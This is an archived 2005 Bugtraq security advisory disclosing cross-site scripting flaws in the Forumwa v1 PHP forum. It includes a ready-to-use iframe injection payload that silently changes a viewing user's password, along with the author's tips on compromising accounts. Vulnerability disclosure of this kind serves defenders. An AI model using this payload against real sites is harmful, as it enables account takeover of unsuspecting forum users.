| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 1 Mar 2005 00:35:21 -0000 From: Raven <raven@...-security.com> To: bugtraq@...urityfocus.com Subject: Forumwa search.php xss vulnerability [][][][][][][][][][][][][][][][][][][][][][][][][][] [][][] [] [] HRG - Hackerlounge Research Group [] Release: HRG005 [] Monday 03/01/05 [] Forumwa_v1 [] [] The author can't be held responsible for any damage [] done by a reader. You have your own resonsibility [] Please use this document like it's meant to. [] [][][][][][][][][][][][][][][][][][][][][][][][][][] [][][] Vulnerable: Forumwa_v1 (any version) --- General information: Forumwa is a simple discussion forum, based on PHP and MYSQL. Beside the basic-features there are special functions like search function, user profiles, memberlist, mailer, feedback? Multilanguage, easy installation. --- Description: The search.php script is vulnerable to a XSS attack by a remote attacker. The searched string is not filtered for any harmfull characters like < > and ". This makes it possible for an attacker to trick a user into going to a harmfull page and stealing a session. Also, the body and the subject of a message posted on the forum are not checked for < or > characters. The combination of these two vulnerabilitys makes a real big problem. --- Proof Of Concept: What this proof of concept will do is load a 1x1px IFrame from a message in the board that will abuse the search.php xss attack to change a viewers password to "wh00ters". How to use: make a post containing the following body and hope someone actually views the messages on the board. Once they open the link to view the post, their account is yours. Tip, make it a nice thread that people will reply to so you know who you compromised. ---PoC Injection--- <iframe SRC=http://[HOST URL CHANGEME!!!]/[FORUM DIRECTORY CHANGEME!!!]/search.php?keyword=%3C/title%3E%3Ciframe%20SRC=http://[HOST URL CHANGEME!!!]/[FORUM DIRECTORY CHANGEME!!!]/account.php?passwdu=wh00ters%26passwda=wh00ters%26emailu=u@...l.com%26changelog=change%20WIDTH=0%20HEIGHT=0%3E%3C/iframe%3E%3Ctitle%3E HEIGHT=1 WIDTH=1></iframe> ---PoC Injection--- All that needs to be altered in this injection are the things between [ ] that says "CHANGEME!!!" --- Fix and Vendor status: Vendor has been notified; expect an official patch soon. --- Greetz: All the people at hackerlounge.com, JWT, TGS-Security.com and JWT-Security.net. Specifically: Th3_R@v3n (me), Dlab, Riddick, Enjoi, Blademaster, Modzilla, Pingu, Jake Johnson, Afterburn, airo, cardiaC, chis, ComputerGeek, deep_phreeze, dudley, evasion, eXtacy, Mattewan, Afterburn, Thanatos_Starfire, Roz, Sirross, UmInAsHoE, Infinite, Slarty, NoUse, Snake (I hate you), Surreal (I hate you), -=Vanguard=-, The_IRS, puNKiey, driedice, Carnuss, oKiDaN, Mr.Mind, dementis, net-RIDER, voteforpedro, Cryptic_Override, kodaxx, ~CreEpy~NoDquE~, Brainscan, the_exode, phillysteak12345, DerrtyJake, =>HeX<=, m0rk, and anyone else I forgot. --- Credit: HRG - Hackerlounge Research Group http://www.Hackerlounge.com [][][][][][][][][][][][][][][][][][][][][][][][][][] [][][] [] [] HRG - Hackerlounge Research Group [] Release: HRG005 [] Monday 03/01/05 [] Forumwa_v1 [] [] The author can't be held responsible for any damage [] done by a reader. You have your own resonsibility [] Please use this document like it's meant to. [] [][][][][][][][][][][][][][][][][][][][][][][][][][] [][][]
Powered by blists - more mailing lists